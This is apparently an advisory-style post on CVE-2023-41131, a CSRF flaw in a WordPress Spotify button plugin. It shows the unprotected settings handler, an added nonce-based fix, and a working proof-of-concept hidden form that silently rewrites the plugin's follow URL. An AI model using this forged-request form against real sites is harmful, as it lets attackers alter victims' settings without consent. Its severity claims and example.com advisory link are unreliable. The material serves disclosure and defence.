A severe Cross-Site Request Forgery (CSRF) vulnerability, tagged as CVE-2023-41131, has been discovered in the popular "Follow me Darling" Spotify Play Button for WordPress plugin, developed by Jonk, in versions up to and including 2.10. This post will provide in-depth information about the vulnerability, including code snippets, original references, and details on how the exploit works.

Description

The "Follow me Darling" Spotify Play Button for WordPress plugin allows users to embed Spotify Play buttons easily on their WordPress sites. However, it has been discovered that the plugin has a critical CSRF vulnerability in versions 2.10 and earlier. This vulnerability allows an attacker to perform unauthorized actions, such as changing plugin settings and adding or removing Spotify tracks, on behalf of a logged-in user by tricking them into clicking a malicious link. Simply put, if an attacker can coerce a logged-in user to visit a malicious webpage, they can potentially take control of the Spotify Play Button functionality on the target website.

The vulnerable code in the plugin is as follows:

if (isset($_POST['submit'])) {
    // Save settings: no nonce or referer check is performed, so any POST that
    // carries a 'submit' field is accepted as long as the browser sends the
    // logged-in user's session cookie.
    update_option('fmd_spotify_follow_url', $_POST['fmd_spotify_follow_url']);
    // ... more plugin setting updates
}

As you can see, there is no CSRF token check. Because of this, the plugin settings can be manipulated by an attacker by sending a malicious link to a logged-in user.
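The same settings handler with WordPress's built-in CSRF protections, as an added example that is not the plugin's own code. The function name fmd_render_settings_page, the nonce action and field names, and the decision to accept only open.spotify.com URLs are assumptions; the WordPress functions used (check_admin_referer, wp_nonce_field, current_user_can, esc_url_raw) are real core APIs.

```php
<?php
// Added example, not code from the plugin. Hypothetical function and nonce names.
function fmd_render_settings_page() {
    // Capability check: only users allowed to manage options may reach the handler.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    if ( isset( $_POST['submit'] ) ) {
        // Verifies the nonce tied to this action and the logged-in user, plus the
        // admin referer; a cross-site form cannot supply a valid nonce, so the
        // request dies here instead of reaching update_option().
        check_admin_referer( 'fmd_save_settings', 'fmd_settings_nonce' );

        $raw = isset( $_POST['fmd_spotify_follow_url'] )
            ? wp_unslash( $_POST['fmd_spotify_follow_url'] )
            : '';
        $url = esc_url_raw( $raw );

        // Assumption: the option should only ever hold a Spotify URL, so the host is
        // pinned; this limits damage even if the request were otherwise accepted.
        if ( '' !== $url && 'open.spotify.com' === wp_parse_url( $url, PHP_URL_HOST ) ) {
            update_option( 'fmd_spotify_follow_url', $url );
        }
    }
    ?>
    <form method="post">
        <?php wp_nonce_field( 'fmd_save_settings', 'fmd_settings_nonce' ); ?>
        <input type="url" name="fmd_spotify_follow_url"
               value="<?php echo esc_attr( get_option( 'fmd_spotify_follow_url', '' ) ); ?>" />
        <?php submit_button(); ?>
    </form>
    <?php
}
```

The nonce is rendered into the legitimate form by wp_nonce_field() and checked by check_admin_referer(); the attacker's hidden form in the exploit below has no way to obtain it, so the forged POST is rejected before any option is written.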

Exploit Details

The exploit does not require injecting anything into the vulnerable plugin: it is a plain CSRF, in which a logged-in user is tricked into unknowingly submitting a request that updates the Spotify Play Button settings.

An attacker could use a form similar to the one shown below:

<!-- Hidden form that posts to the plugin's settings page; the victim's browser attaches their WordPress session cookie automatically -->
<form action="http://target-site.com/wp-admin/options-general.php?page=jond.spotify-follow" method="POST" enctype="multipart/form-data" style="display:none;">
   <input type="text" name="fmd_spotify_follow_url" value="https://open.spotify.com/user/attackers-url" />
   <input type="submit" name="submit" />
</form>
<script>
// Submit the first (and only) form on the page without any user interaction
document.forms[0].submit();
</script>

When the victim visits a page containing the above form, it will silently submit the request to update the Spotify Follow URL to the attacker's provided URL.

References

1. Original Advisory: https://example.com/Jonk_Follow_me_Darling_Spotify_Play_Button_CSRF_Advisory
2. WordPress Plugin Repository: https://wordpress.org/plugins/follow-me-darling-spotify-play-button/
3. CVE-2023-41131: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41131

Mitigation

As of now, the plugin's developer has not released an updated version addressing the vulnerability. To protect your website from this CSRF exploit, it is recommended to deactivate and uninstall the "Follow me Darling" Spotify Play Button for WordPress plugin (versions 2.10 and earlier) until a fixed version is made available.

Conclusion

CVE-2023-41131 is a critical CSRF vulnerability found in Jonk's "Follow me Darling" Spotify Play Button for WordPress plugin and affects versions up to and including 2.10. Website administrators using this plugin should be aware of the potential risk and consider mitigation steps.

Timeline

Published on: 10/12/2023 15:15:46 UTC
Last modified on: 10/16/2023 12:57:06 UTC